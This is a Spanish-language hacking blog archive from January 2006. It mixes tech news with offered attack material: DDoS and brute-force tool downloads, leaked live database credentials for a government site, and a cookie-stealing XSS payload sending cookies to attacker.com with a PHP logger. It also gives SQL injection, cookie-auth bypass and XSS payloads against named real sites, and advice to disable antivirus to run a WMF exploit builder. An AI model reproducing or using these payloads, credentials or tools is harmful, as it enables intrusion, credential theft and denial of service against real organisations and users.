Herramientas...

PortFuck 1.02B Private Build

Download:

AQUI

o

AQUI



---------------------------------------------------------------------------------------------
HTTP Flooder v1.0.1

Download:

AQUI

Ophcrack, recupera y cambia tus contraseñas de Windows...

Ophcrack 2.1 es una aplicación que permite obtener las contraseñas de tu sistema Windows basado en el Ophcrack 1.0, disponible tanto para Windows como para Linux gracias a las libretrías GTK.

Ophcrack Live CD 0.9 es una distribución linux, basada en la Ubuntu 5.04, en formato Live CD que está preparado para acceder a las particiones de Windows, copiar temporalmente en el sistema y analizar el archivo SAM, el que gestiona las contraseñas de Windows, para luego descomprimirlo y descifrarlo.

Con ello podremos obtener la contraseña de nuestro sistema Windows y permitirnos acceder a él.

Descarga LiveCD | Sourceforge.
Descarga Windows | Sourceforge.
Descarga Linux | Sourceforge.
Fuente | MundoGeek.

Salu2

Rayos X para Firefox...

Una nueva extensión para Firefox, capaz de dotar de "rayos x" al navegador alternativo.

Descubrimos a través de Digg una curiosa extensión para Firefox: "X-Ray".

La cual una vez instalada nos muestra de un vistazo las etiquetas HTML que posee la página que estamos visitando.

Y todo ello cómodamente desde una simple pantalla, y sin necesidad de tener que mirar el código fuente.

Interesante.

Mas Info

Salu2

GookBox, música en Gmail...

¿Te gustaría poder disponer de los más de 2 GB que nos ofrece Google para almacenar y reproducir tus canciones ?.

Eso es precisamente lo que nos ofrece GookBox, subir, descargar y escuchar tu música favorita a través de nuestra cuenta Gmail.

El programa está integramente desarrollado en Java y corre perfectamente en Windows XP y Linux.

Interesante.

Mas Info

salu2

martes, enero 10, 2006

Graves Fallos de Seguridad...

Distintos fallos de seguridad en paginas WEB de organismos publicos y empresa de servicios internacional:

1-) Prensa.oceba.gov.ar (organizacion de prensa argentina)

Posee un sistema php-nuke (sin actualizar), vulnerable por medio de un exploit que crea un ¨admin¨ , con la facilidad de logearse dentro del sistema...
El exploit para crear un admin en esta web: AQUI

2-) Facultad de Informática y Electrónica del Ecuador

Ingresando a http://www.espoch.edu.ec/fie se percibe un error, el index.php no hace inicio al directorio. A causa de esto se pueden ver las carpetas y los archivos dentro del directorio "fie". Si se ingresa al directorio "admini" se puede obtener los nombres de usuarios y sus respectivos passwords para ingregar al panel de control de la administracion de la facultad. Tambien se logra obtener los datos de la db y otra informacion sensible.

Fuente: r-alert

3-)Ministerio de Educacion de la Nacion Argentina

El user ¨Zorro¨ ha encontrado un GRAN agujero de seguridad en la web oficial del ministerio de educacion http://www.me.gov.ar, en el cual se pueden ver el user y el password de la conexion a la base de datos MYSQL.
El fallo se centra en un archivo llamado ¨titulo2.inc¨ contenido en la siguiente direccion:

http://www.me.gov.ar/centro/titulo2.inc

En donde se pueden observar los siguientes datos:

?
$link = mysql_connect("bdatos.me.gov.ar", "A_dsweb","EcSdrT"); (user password y host de conexion)
mysql_select_db("dsweb", $link);
$error=mysql_error($link);
if ( $error = " ")
{

Donde se observa claramente el nombre de usuario, password de la base de datos y el host de conexion...

para mas datos sobre esta vulnerabilidad y ejemplos de como usarla en esta WEB

4-) Fallo en Empresa de Gas de EE.UU

Se trata de un curioso fallo, mediante el cual se puede acceder, a un variado menu de opciones de registros, reportes, altas, bajas, etc.se trata de una importante empresa que posee entre sus clientes a CITIBANK , UNITED STATES TREASURE, UTAH, etc, etc.., como pueden ver en las imagenes ilustrativas.
Sobre como ingresar y utilizar este fallo, remitase a esta WEB

Herramienta: DDOS Tool

Modo de Uso:

st-kill < host > < puerto >

en linux:

"./name_of_file < ip > < puerto >"

Download:

http://www.sendspace.com/file/hxgslp

http://rapidshare.de/files/10727569/ddos.html

http://www.megaupload.com/?d=PEKS4PP6

Salu2

Parches de Enero para Windows...

Han salido 3 boletines, entre los que se incluye el ya adelantado MS06-001, todos ellos clasificados como críticos.

MS06-001: Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (912919)
Resuelve el problema de ejecución remota causado por el problema de los archivos WMF, ya hemos hablado bastante aquí de ello.

MS06-002: Vulnerability in Embedded Web Fonts Could Allow Remote Code Execution (908519)
Concierne a un fallo que afecta a todas las versiones "modernas" de Windows, mediante el cual un atacante podría crear una fuente especialmente manipulada e "incrustarla" en un documento web, la cual, al ser vista a través de una web o de un email, puede dar el control del equipo de la víctima al atacante.
Mas información sobre las fuentes "incrustadas": http://www.microsoft.com/typography/web/embedding/default.aspx

MS06-003: Vulnerability in TNEF Decoding in Microsoft Outlook and Microsoft Exchange Could Allow Remote Code Execution (902412)
Vulnerabilidad crítica que afecta al Microsoft Office 2000/XP/2003 y al Microsoft Exchange Server 5.0/5.5/2000SP3 .
Transport Neutral Encapsulation (TNEF) es un formato utilizado por los clientes de email de Microsoft Exchange Server y Outlook cuando se envían mensajes con formato enriquecido "Rich Text Format" (RTF). Cuando Microsoft Exchange considera que está enviando un mensaje a otro cliente de email de Microsoft, extrae toda la información del formato del email y la codifica en un bloque especial TNEF. Después de esto, envía el mensaje en dos partes, una con el texto sin formato y otra con las instrucciones del formato del texto en el bloque TNEF. El cliente de email de Microsoft recibe el bloque TNEF y reformatea el texto del email enviado.
Un atacante puede tomar el cotrol total de un sistema vulnerable mediante el envío de un mensaje con el bloque TNEF especialmente manipulado, a un cliente que esté utilizando Outlook o Exchange Server.
Mas información sobre el TNEF:
http://support.microsoft.com/?scid=kb;es;241538

Fuente:Cyruxnet

salu2

nueva vulnerabilidad en el procesamiento de archivos WMF...

SecurityFocus ha publicado un reporte sobre una nueva vulnerabilidad en el proceso de archivos WMF no cubierta por la actualización MS06-001.

El motor de procesamiento de gráficos WMF de Microsoft está afectado por múltiples vulnerabilidades de corrupción de memoria. Estos fallos afectan a las funciones 'ExtCreateRegion' y 'ExtEscape'.
El problema se presenta cuando un usuario visualiza un archivo WMF especialmente alterado.

Los reportes indican que estos fallos pueden ocasionar una condición de Denegación de Servicio (DoS), sin embargo, se cree que también es posible la ejecución de código arbitrario.

Lennart Wistrand de Microsoft dice que:
"...Por lo que se ve, estos crashes (cuelgues o fallos), no son explotables, si son, en cambio, cuestiones de desempeño o funcionamiento de Windows ..." ;-)

Según Microsoft este problema no permite que un atacante ejecute código arbitrario, ni ocasionar el cuelgue del Sitema Operativo, solo podría ocasionar el fallo de la aplicación que procesa el archivo WMF. También afirman que ya habían identificado este tipo de problemas con anterioridad, y los están evaluando para resolverlos en un próximo Service Pack.

En la lista Full-disclosure ya se ha publicado una PoC (Prueba de Concepto) para esta vulnerabilidad que la puedes descargar de AQUI

Ref.:

SecurityFocus:
Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities
http://www.securityfocus.com/bid/16167/discuss

[Full-disclosure] PoC for the 2 new WMF vulnerabilities (DoS)
http://seclists.org/lists/fulldisclosure/2006/Jan/0303.html

Microsoft Security Response Center Blog:
Information on new WMF Posting
http://blogs.technet.com/msrc/archive/2006/01/09/417198.aspx

salu2

lunes, enero 09, 2006

Herramientas...

¨New B¨ es un Instrumento completo para la Administración Remota. Tiene varias funciones como Director de Archivo, Director de Windows, Director de Proceso, Información Remota de la computadora personal, etc.

Interesante...

DOWNLOAD

Salu2

GoogleModules.com

No es una página oficial de Google pero contiene numerosos módulos para personalizar la Homepage de Google.

GoogleModules.com clasifica una amplia colección de módulos para Homepage de Google.

Permite sindicación RSS.

MAS INFO

Salu2

Las Primeras actualizaciones del 2006...

Las actualizaciones de las aplicaciones no se toman descanso y siguen atacando con nuevas versiones, de las cuales, rescatamos las siguientes:

* ¿Te gusta personalizar tu sistema operativo windows? A mi sí y Fresh UI es la herramienta ideal que me permite configurar y personalizar mi sistema en diferentes aspectos.

* Para quienes no quieran complicarse la vida a la hora de escuchar música, leebies mp3 player es un reproductor ligero y compacto, que además soporta los formatos .mpg,.mp1,.mp2;.mp3, .ogg, .wma y .asf

* MP3Tag saca su nueva versión que nos permitirá editar los tags de nuestros archivos de audio.

* Con Reaper nos permitirá grabar y editar nuestros archivos de audio, y en esta versión se corrigen fallos, se añade soporte a MIDI y a VSTi, entre otras mejoras.

* Unlocker trae una nueva versión con el que nos permitirá borrar archivos que esten en uso por otras aplicaciones tan sólo desbloqueándolas.

* Las aplicaciones para ver nuestras imágenes no paran, a ACDSee, Irfanview y XNView ahora le sumaremos Viewer & slideshow, donde podremos ver las imágenes de cada carpeta mediante miniaturas pero además podemos crear nuestras propias presentaciones.

* Con WinAudit 2.04 podrás darle un buen repaso a la configuración del hardware y software de tu equipo con este estupendo programa de auditoria.

* Hay mejores aplicaciones que el Frontpage, WYSIWYG Web Builder es una de ellas que, además, no te hará falta conocer HTML, permitiendote subir tus archivos por FTP a tu servidor web.

* Chatea con tus amigos mientras juegas con xfire, un programa de mensajería ideal para esos jugones que además no quieren perder el contacto con sus amigos.

* Con Yahoo! Widget Engine 3.0.2 nos permitirá añadir mini aplicaciones en el escritorio de lo más interesante, como alarma, reloj, calculadora y otros widgets.

Todas estas aplicaciones son para Windows y te las puedes descargar gratis de la web de cada autor.

Salu2

domingo, enero 08, 2006

Como instalar Google Screensaver sin usar Google Pack

Poco despues de la aparición de Google Pack, ya algunos hackers han publicado los binarios correspondientes a Google Screensaver que nos permite bajárnoslo e instalarlos como cualquier otro salvapantallas de los que tenemos instalados en el sistema. Esta versión hackeada del salvapantallas de Google le han eliminado su logo y nos permitirá reproducir en nuestros monitores nuestras fotografías mediante “slideshow” o “collage”.

Una vez bajado el salvapantallas, y puesto en el directorio de Windows, C:\ Windows, vamos a Propiedades de pantalla -> Protector de pantalla y dentro deplegamos la pestaña de salvapantallas, eligiendo el Google Screensaver. Luego configuramos las transiciones, tiempos y seleccionamos las fotos de nuestro disco duro para que sean mostradas en el salvapantallas.

Fuente | Labnol
Descarga | Google Screensaver hackeado

Salu2

Vulnerabilidades en Aplicaciones...

Xoops Pool Module IMG Tag XSS

Introduce en un post este codigo:
< img src = " javascript:window.navigate%28"('hxxp://attacker.com/cookies.php? c=" +document.cook ie);"

y dentro de ¨cookies.php¨, ingresa lo siguiente:

/ ?
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?
-----------------------------------------------------------

NavBoard BBcode XSS

Ejemplo de BBcode:

Para V16(2.6.0)
[b] <> [/b]
[textlarge] < XSS > [/textlarge]

Para V16(2.6.0) y V17beta2
[url=javascript:alert(123)]title[/url]

------------------------------------------------------------

427BB Multiple Vulnerabilities

427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)

1. Autentificacion bypass usando valores de cookie modificadas.

Cookie: username=admin;
Cookie: authenticated=1;
Cookie: usertype=admin;

2. Ejemplo de SQL Injection.

Tiene que estar conectado como el usuario registrado.
http://host/bb427/showthread.php? ForumID=999% 20union%20select% 20UserName, Passwrod,null, null%20from% 20prefPersonal

3. Insercion de codigo script arbitrario.

postee un nuevo mensaje:.
Message text:
[url=javascript:alert(123)]clickme[/url]

------------------------------------------------------------

Proyecto Domus 'email' XSS

Ejemplo de URL:
http://host/domus/escribir.php? domus=ae29cf4d3f2dc42241e387d39b4126e2&hilo=1&amp;amp;padre=1&categoria=General&n=&usario=username&email=e@\';% 20alert(123);% 20var%20dss=\'h.co&asunto=blabla&amp;texto=anytext&accion=enviar

Fuente:hackers-news.com

Salu2



AOL Multiple XSS Vuln

Vulnerabilidad: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severidad: Media/Alta

Probado en: Microsoft IE 6.0 y FireFox 1.5

Detalles:

Los motores de búsqueda de AOL.com se crean con AOLserver Dynamic Pages (o ADP). ADP es un conjunto de extensiones del servidor web para diseñar dinámicamente documentos. Utilizando AOLserver , ADP vuelve un documento al usuario basado en correr un conjunto de códigos de Tcl con argumentos proporcionados por el usuario. Esto es basado en Páginas Activas del servidor de Microsoft.

Prueba de Concepto:

http://peopleconnection.aol.com/dirmodule.adp?_did=55004"><>alert('VULNERABLE')&_dtype=csv&amp;_dcookie= 1&_dpath=pc_main,pc_main&_dsect=1#

http://health.aol.com/dirmodule.adp?_did=41623"><>alert('VULNERABLE')&_dtype=csv&amp;_dcookie=0&_dpath=
hlth_talk,hlth_talk&_dsect=1&dirHeader= Health%20Talk%20Directory

http://health.aol.com/dirmodule.adp?_did=41623">&_dtype=csv&_dcookie=0&_dpath=
hlth_talk,hlth_talk&_dsect= 1&dirHeader=Health%20Talk%20Directory#

http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><> alert ('VULNERABLE') < / script >

http://aolexpressions.aol.com/main.adp?expTypeId=1"><>alert('VULNERABLE')< /script >&clientId=2

http://aolexpressions.aol.com/search.adp?clientId=2&search=<>alert ('VULNERABLE')< / script >

http://food.aol.com/food/recipefinder.dyn?action=howItWorks"><>alert('VULNERABLE')< / script >

Ejemplo de Robo de Cookie :

http://aolexpressions.aol.com/search.adp?clientId=2&search=<>document.location='http://www.some-attacker-site/grab.php?cookie='+escape (document.cookie).substr(0,1900)

Fuente:fr33d0m.net

Salu2



Recopilatorio de Herramientas...

Triton (Scanner) de Rhino -
http://rhino.deny.de/triton/index.php direct download

CMX IV de Xtremnet -
http://xtremet.deny.de/products.htm

CCBill Local Cgi Exploiter de Ksoze-
http://ksoze.deny.de/ccbill_exp.html

IBT2 de wolfman:
http://wolfman.deny.de/tools.html

Hephaestus's Ashen Spear de Wolfman:
http://wolfman.deny.de/HAS.php

Harvester de Madmax
http://www.icefortress.com/

Intellitamper
http://www.intellitamper.com/infos.php

C-Sploiter de Carpetboy
http://carpetboy.deny.de/tools/CSF.zip

Brute Forcers

http://www.hoobie.net/brutus/

http://www.openwall.com/john/

http://www.hackology.com/html/mungabunga.shtml

http://www.accessdiver.com/

C-Force

http://carpetboy.deny.de

•Word lists

http://www.outpost9.com/files/WordLists.html

http://www.totse.com/en/hack/word_lists/

Final Ares Complete Edition

http://www.xisp.org/downloads/FACE_Setup.zip

Goldeneye

http://www.xisp.org/downloads/goldeneye.zip

Sentry1.4.CE

http://www.freewebs.com/t800t/Sentry1.4.zip

Dansnowb7

http://www.netxeyes.org/dansnowb7setup.exe

Dansnowb7_cn

http://www.netxeyes.org/dansnowb7_cn.zip

EXPLOIT tool: CMX Exploiter IV

http://www.xisp.org/downloads/cmxiv_setup.zip

Triton_v0.3

http://rhino.deny.de/triton/Triton_v0.3.zip

Triton_v0.3 [ sinicizes version ]

http://www.freewebs.com/t800t/Triton_v0 [ 1 ] 3.rar


Dictionary tool:

MagicFilter

http://www.freewebs.com/t800t/MagicFilter.rar

Raptor3 [ belt sinicizes patch ]

http://www.freewebs.com/t800t/Raptor3.zip

The SuperDic_V3.2 registration version

http://www.freewebs.com/t800t/SuperDic_V32.zip

Pwdmaker_1.151

http://www.freewebs.com/t800t/pwdmaker_1.151.rar

Decodes the tool: John the Ripper

http://www.xisp.org/downloads/jtr.zip

AUthX

http://www.freewebs.com/t800t/AUthX.rar

Withdraws the password and processes the LOG files tool:

Z_nakeR2

http://www.freewebs.com/t800t/Z_nakeR2.zip

ccbrip

http://www.xisp.org/downloads/ccbillrip.zip

ibillrip

http://www.xisp.org/downloads/ibillrip.zip

*Accessdiver (AD) by Jean Fages

http://www.accessdiver.com

*Sentry de Sentinel:

http://sentinel.deny.de/sentry.php

Goldeneye de Madmax

http://madmax.net/products/goldeneye/goldeneye.htm

*Form@ (especificamente para FORM sites) de SSS -

http://sss.deny.de/

Caecus de Sentinel (para form sites que requieren OCR [t4wsentry.pl])

http://sentinel.deny.de/Caecus.php

Ares by Gamoaa -

http://www.xisp.org/downloads/FACE_Setup.zip


Brutus

http://www.hoobie.net/brutus/

AuthForce by Zachary P. Landau

http://kapheine.hypa.net/authforce/index.html

Entry by Sparkleware

http://www.sparkleware.com/entry/index.html

Xavior By LithiumSoft

http://www.btinternet.com/~lithiumsoft/Products.html

Web Password Checker (WPC) .1 For UNIX de g1soft

available @ http://www.securityfocus.com/tools/885/scoreit

Munga Bunga's http Brute Forcer de Munga Bunga

http://www.hackology.com


Wordlist Tools:

*Raptor 3 de Madmax -

http://madmax.net/products/raptor/raptor.htm

Words Extractor

http://www.intellitamper.com/wordsextractor/

Lucifer de Rhino -

http://rhino.deny.de/lucifer.php

ALS_novice de Wolfman -

http://wolfman.deny.de/tools.html

Z-leecher de Beda

http://goldmaster.webpark.cz/sleech.html

S-Generator de Beda

http://goldmaster.webpark.cz/sgen.html

S-WordlistTool de Beda

http://goldmaster.webpark.cz/swordt.html


Proxy Tools:

*Proxyrama de Gaamoa -

http://gaamoa.deny.de/

*Charon de Rhino -

http://www.icefortress.com/hosts/rhino/

*Advanced Proxy Leecher (APL) de Sentinel-

http://sentinel.deny.de/apl.htm

Geowhere de Jean Fages (NO Freeware) -

http://www.geowhere.net/

Proxy List Filter -

http://www.freeproxy.ru/en/programs/proxy_filter.htm

AATools de Glocksoft

http://www.glocksoft.com/aatools.htm

Proxy Bag

http://www.intellitamper.com/proxybag/

S-Proxy Tool de Beda

http://goldmaster.webpark.cz/sproxy.html


Exploiting Tools:

*Triton (Scanner) de Rhino -

http://rhino.deny.de/triton/index.php

*CMX IV de Xtremnet -

http://xtremet.deny.de/products.htm

CCBill Local Cgi Exploiter de Ksoze-

http://ksoze.deny.de/ccbill_exp.html

IBT2 de wolfman:

http://wolfman.deny.de/tools.html

Hephaestus's Ashen Spear de Wolfman:

http://wolfman.deny.de/HAS.php


Intellitamper

http://www.intellitamper.com/infos.php

Putty

http://www.chiark.greenend.org.uk/~sgtatham/putty/

Decrypting Tools:

*John The Ripper (JTR) -

http://www.openwall.com/john/

MDcrack (MD5 Cracker) -

http://membres.lycos.fr/mdcrack/

Distributed John The Ripper de Luis Parravicini

http://ktulu.com.ar/en/djohn.php

Cain and Abel de Massimiliano Montoro

http://www.oxid.it/cain.html

Salt Grinder de Wolfman

http://wolfman.deny.de/SaltGrinder.php

Log Tools:

LogRip de Rhino -

http://rhino.deny.de/logrip.php

Azarius de Rhino -

http://rhino.deny.de/azarius.php

Zimapass Parser de Sentinel:

http://sentinel.deny.de/zimaparser.htm

*C-Parse (ccbill.log parser) de Sentinel:

http://sentinel.deny.de/c_parse.htm

CCBill USI (CCBILL analizador que quita toda cuenta inactiva antes de desencriptarla)

http://membres.lycos.fr/ccbill/

Accessdiver/Ares Parser de Sentinel:

http://sentinel.deny.de/ad_ares_parser.htm


Spoofers:

Zspoof de wolfman -

http://wolfman.deny.de/tools.html

Sploof de Jean Fages -

http://www.accessdiver.com/sploof.htm

Final Spoof

http://www.beatharness.com/finalspoof/

Spooph de nast0

http://24.106.100.133/spooph/index.html

D-Spoof And Others (Russian Sitio, English Programa)

http://mspoofer.pisem.net/zaza/index.htm

Mikho's Online Spoofer (web based spoofer)

http://mikho.kicks-ass.net/spoofs/spoofs.hta

QuickSpoof

http://httpd.chello.nl/~m-koster2/spoofs.htm


Other Tools:

Scholar de Sentinel - (History checker)

http://sentinel.deny.de/scholar.htm

Crackmate Gold de Xtremet (adultcheck gold pass verifier) -

http://xtremet.deny.de/products.htm

Dabest's Tools de Dabest - available at jaddo.net Forums

AAtools

http://www.glocksoft.com/aatools.htm

Salu2

Dos nuevos parches prevé Microsoft para enero...

Además de haber liberado anticipadamente el parche para la vulnerabilidad en los archivos WMF, Microsoft anuncia para el segundo martes de enero, la liberación de acuerdo a su programa mensual de actualizaciones, de 2 nuevos boletines de seguridad con otros tantos parches para sus productos.

El próximo 10 de enero, Microsoft planea liberar los siguientes boletines de seguridad:

- Un boletín de seguridad que afecta a Microsoft Windows.

- Un boletín de seguridad conteniendo parches para Microsoft Exchange y Microsoft Office.

El nivel de severidad asignado para ambos, es de "Crítico", el valor más alto que Microsoft asigna a sus parches. Esto significa que estas actualizaciones deberán ser instaladas lo antes posible. Ambas afectan a diversas versiones de Windows.

Además de ello, se publicarán cuatro actualizaciones no relacionadas con la seguridad, a través de Windows Update (WU) y Software Update Services (SUS). Estas actualizaciones están catalogadas como de alta prioridad.

Cómo siempre, Microsoft recuerda que esta información es susceptible a cambios.

Los detalles de los boletines de seguridad programados, no son revelados por Microsoft, para evitar que personas maliciosas saquen provecho de las vulnerabilidades cubiertas antes de que las mismas hayan sido solucionadas.

Además de estos parches, quienes se actualicen vía Windows Update, recibirán como ya es costumbre, el "Microsoft Windows Malicious Software Removal Tool", una versión de un software que examina el PC en busca de virus, gusanos, troyanos y otra clase de malwares conocidos, pero que no mostrará al usuario mensaje alguno, a no ser que se detecte algún código sospechoso.

Más información:

Microsoft Security Bulletin Advance Notification
www.microsoft.com/technet/security/bulletin/advance.mspx

Artículo original:
www.enciclopediavirus.com/noticias/verNoticia.php?id=611

Salu2

sábado, enero 07, 2006

Nuevo Firefoxit: Los "widgets" llegan a Firefox...

Firefoxit 0.1.3 es una nueva extensión para Firefox, que transforma al navegador en un contenedor de pequeñas aplicaciones web.

Emulando la idea de Konfabulator, Firefoxit es una extensión para Firefox, que transforma al navegador en un complejo entorno, cada día más parecido a un escritorio.

Funciona sobre todo tipo de plataformas, y una vez instalado admite "widgets" en formato propio ".fire".

Interesante.

MAS INFO

Google Pack disponible para descarga...


Ya está disponible para descarga Google Pack. Finalmente incluye: Google Desktop, Google Earth, Google Pack Screensaver, Google Talk, Google Toolbar, Picasa, Ad-Aware SE Personal, Adobe Reader 7, GalleryPlayer HD Images, Mozilla Firefox, Norton AntiVirus 2005 SE, RealPlayer y Trillian. Además trae una utilidad llamada Google Updater que mantiene en memoria y controla la actualización de cada uno de los elementos. Sólo Windows XP.

Lo más llamativo es que el Norton AntiVirus 2005 SE es sólo de prueba durante seis meses, si se quiere seguir usando hay que pasar por caja de Symantec. La verdad es que le veo poca utilidad a este Google Pack, quizás para usuarios noveles pueda ser interesante dejar el tema de las actualizaciones de sus productos a Google, aunque el resto de programas tengo un interés marginal (todo el mundo los tiene ya instalados o una utilidad alternativa) y el valor aportado por venir en un pack bastante dudoso. En fin, os dejo con la página para instalarlo... Google Pack Installer.

salu2

viernes, enero 06, 2006

Herramienta: Sqlinject


Una excelente herramienta que simplifica el tema de las SQL inyections, viene con un ejemplo real incluye interfaz grafica y demas opciones...

Funciona bajo: XP,2000,NT4

DOWNLOAD

Salu2

XSS en Paginas WEBs de EE.UU....

XSS en Liga Mayor de Baseball

Pagina Vulnerable:htt://shop.mlb.com

Prueba de Concepto:

http://shop.mlb.com/searchHandler/index.jsp?keywords=[XSS_CODE_HERE]

EJEMPLO

------------------------------------------------------

XSS en Tiendas Wal-Mart

Pagina Vulnerable:http://www.walmartstores.com

Prueba de Concepto:

http://www.walmartstores.com/GlobalWMStoresWeb/search.do?subcatid=316&simplesearchfor=[XSS_CODE_HERE]

EJEMPLO

--------------------------------------------------------

XSS en Tiendas NBC universal

Pagina vulnerable:http://nbcstore.shopnbc.com

Prueba de concepto:

http://nbcstore.shopnbc.com/Search/Default.aspx?start=0&searchval=[XSS_CODE_HERE]

EJEMPLO

--------------------------------------------------------

XSS en Disney Shopping

Pagina vulnerable:http://disneyshopping.go.com

Prueba de concepto:

http://disneyshopping.go.com/DSSearch.process?Searchstr=[XSS_CODE_HERE]

EJEMPLO

salu2

jueves, enero 05, 2006

Microsoft Security Boletin MS06-001 Publicado...

Microsoft ha publicado un boletín de la seguridad para la ejecución de código del Motor de Interpretación de Gráfico (WMF).
Microsoft planeó originalmente liberar la actualizacion el martes, 10 de enero de 2006 como parte de su emision regular de boletines de seguridad, una vez que fuera probado que la compatibilidad con la aplicación era completo. Sin embargo, el testeo se ha completado anticipadamente y la actualizacion está lista.

Mas Info
boletín Nº MS06-001

Salu2

IE6/XP denial of service

Un sencillo, a su vez grande, archivo ¨JPG¨, produce el ¨cuelgue¨ ( y reinicia) Windows XP SP2 con todos los parches hasta la fecha...tambien fue testeado con firefox 1.5 y aveces produce el mismo resultado...

Prueba de Concepto:

AQUI

salu2

Microsoft publica por error una versión preliminar de su parche para WMF...

Una versión preliminar del parche para la vulnerabilidad WMF, fue puesta a disposición de los usuarios de un sitio comunitario de seguridad, por un error de un empleado de Microsoft.

La gente de Sunbelt obtuvo una copia del parche de Microsoft, y verificaron con algunas pruebas rápidas que éste parece funcionar bien, bloqueando uno de los exploits, y aparentemente coexiste sin problemas con el parche no oficial de Ilfak Guilfanov.

Más información (en inglés):
sunbeltblog
sunbeltblog
zdnet
securityfocus
technet

Salu2

Cuadro de situacion de los Antivirus frente a WMF...

AV-test.org, un laboratorio independiente que testea productos antivirus, ha estado investigando la detección de exploits basados en la vulnerabilidad WMF.
Debajo están los resultados del análisis de 73 variantes distintas del exploit, al 1 de enero de 2006 por la mañana, con distintos productos antivirus:

Detección<--------->Productos

73 de 73: AntiVir, Avast!, BitDefender, ClamAV,Command, Dr Web, eSafe, eTrust-INO, eTrust-VET, Ewido, F-Secure, Fortinet, Kaspersky, McAfee, Nod32, Norman, Panda,Sophos, Symantec, Trend Micro, VirusBuster

67 de 73: Ikarus, VBA32

54 de 73: F-Prot

13 de 73: AVG

11 de 73: QuickHea

Ref.:
PC Magazine
Current WMF exploit detection by AV scanners as of January 1, 2006

Salu2

miércoles, enero 04, 2006

Microsoft Windows WMF Download and Exec Exploit

Publicado por la gente de Shellc0de, un nuevo exploit para explotar esta vulnerabilidad, lo puedes descargar de este enlace:

EXPLOIT

Modo de Uso (luego de compilado): wmfexpdown.exe [URL]

Salu2

martes, enero 03, 2006

Ataques WMF por e-mail...


La gente de Messagelabs a descubierto un ataque interesante en el dia de hoy.

Un archivo nuevo que explota la vulnerabilidad WMF, procedente como Spam desde Corea del Sur, apuntaba a una decenas de miles de casillas de correos.

El mail malicioso impulsaba a las victimas a ejecutar el archivo adjunto llamado ¨MAP.WMF¨ que intentaba explotar el sistema y descargar un backdoor desde la web www.jerrynews[dot]com.
Lo interesante del caso, es que el remitente del mail se hacia pasar como perteneciente a una institucion de seguridad de EE.UU.

Salu2

Kit para la construcción de WMF...

Se acaba de descubrir un kit para la construccion de un archivo WMF. El archivo que genera se basa en el exploit de metasploit ¨primera generacion¨ publicado la semana pasada.

El programa en si mismo no es tan interesante, lo es el hecho que utiliza a windows en modo consola, para generar un archivo llamado ¨evil.wmf¨que lo carga desde la linea de comando.

Su uso es facil, pero se necesita de usuarios que sepan escribir payloads, o de donde descargar algunos.
Es detectado por algunos antivirus como W32/Kit_WMF.A

Fuente:F-Secure

Actualizacion: Dado que ya salio el parche oficial de este defecto, aqui tienen la herramienta a que hace referencia este articulo, para descargar.La mayoria de los antivirus ya la detectan como ¨hackTool¨, por lo que deberas desactivarlo para poder usarla.

Wmf-maker

salu2

Valdersoft Shopping Cart Remote Command Execution Exploit...

Fallo de Remote File Inclusion & Command Execution en sistemas de shoppings: Valdersoft Shopping Cart, el bug se basa en estas lineas:

include($catalogDocumentRoot.$catalogDir."include/modules/categories_path.php");

Por lo cual un atacante remoto puede incluir un archivo y ejecutar comandos remotos en el servidor victima, a continuacion el exploit ...

Exploit Manual:


Exploit en Perl

Salu2

A Esperar hasta el Martes 10 para la solucion al ¨Bug¨ WMF...

Segun se informa en la pagina de Microsoft habra que esperar hasta el proximo martes 10 para el update a WMF. Segun lo que alli se expresa:¨El 28 de diciembre Microsoft confirmó los detalles técnicos del ataque e inmediatamente comenzó a desarrollar el update de Seguridad para la vulnerabilidad WMF.

Microsoft ha completado el desarrollo del update de Seguridad para la vulnerabilidad. El update está siendo testeado para asegurar su calidad y compatibilidad con las aplicaciones. El objetivo de Microsoft es lanzar el update el martes 10 de enero como parte de su release mensual de boletines de seguridad.

El update será lanzado simultaneamente en 23 lenguajes para todas las versiones de Windows una vez que se hayan pasado los rigurosos procedimientos de testing. Estará disponible en el Microsoft Download Center, en Microsoft update and Windows update. El update será descargado automáticamente a los clientes que utilizan Windows.

...aunque se están llevando ataques, las fuentes de inteligencia de Microsoft indican que el alcance del ataque no fue extenso.

Además, las compañias antivirus indican que los ataques basados en la explotación de la vulenrabilidad WMF esta siendo efectivamente mitigada a través de los update de firmas.¨

Salu2

aMSN Messenger DoS (Send File)...

AMSN es "un clon de codigo abierto de MSN". Una vulnerabilidad en el aMSN permite a un atacante remoto causar en el cliente que no pueda responder a pedidos legítimos.

Detalle:
El ¨Bug¨ consiste en que cuando el atacante manda un archivo vía AMSN, abre el puerto para mandar y recibir el archivo, el puerto que abre generalmente es el 6891 (puede ser aleatorio). El siguiente exploit congelará al cliente de la víctima y lo cerrara.

Exploit en Perl

Fuente:fr33d0m.net

Salu2

XSS ( Web National Vulnerability Database)

Pagina Vulnerable:

http://nvd.nist.gov/

Prueba de Concepto:

En la seccion de ¨Email List ¨ ingresar lo siguiente:




Fuente:securitytracker


Salu2

lunes, enero 02, 2006

¿ Google PC ?.

Forma parte de las predicciones para el 2006 de Sallie Hofmeiste, una periodista del "Los Angeles Times", medio generalmente siempre bien informado.

Sallie Hofmeiste afirma tener fuentes que indican que Google está actualmente en negociaciones con Wal-Mart Stores Inc. y otras tiendas para vender un Google PC.

La máquina correría un sistema operativo propio, basado en Linux y desarrollado por Google, que se vendería a un precio de 200 dólares aproximadamente.

Por otro lado el analista Bear Stearns especula con que los usuarios pronto veremos un sistema informático doméstico llamado "Google Cube", un pequeño ordenador destinado al ocio, con conexión a Internet y capaz de reproducir vídeo y audio.

De cualquier modo Hofmeiste se muestra convencida de que Larry Page aprovechará el "2006 International Consumer Electronics Show" de esta semana para ofrecer más detalles de la iniciativa.

Artículo en Los Angeles Time

Salu2

Firefox 2 para el 27 de junio...

En el Wiki de Mozilla, ya se ha colgado la información referente al futuro Firefox 2.

Según esos datos, la fecha prevista para la salida de la segunda versión del navegador favorito sería el 27 de junio.

El camino que deberá andar antes de esa fecha es el siguiente, más o menos:

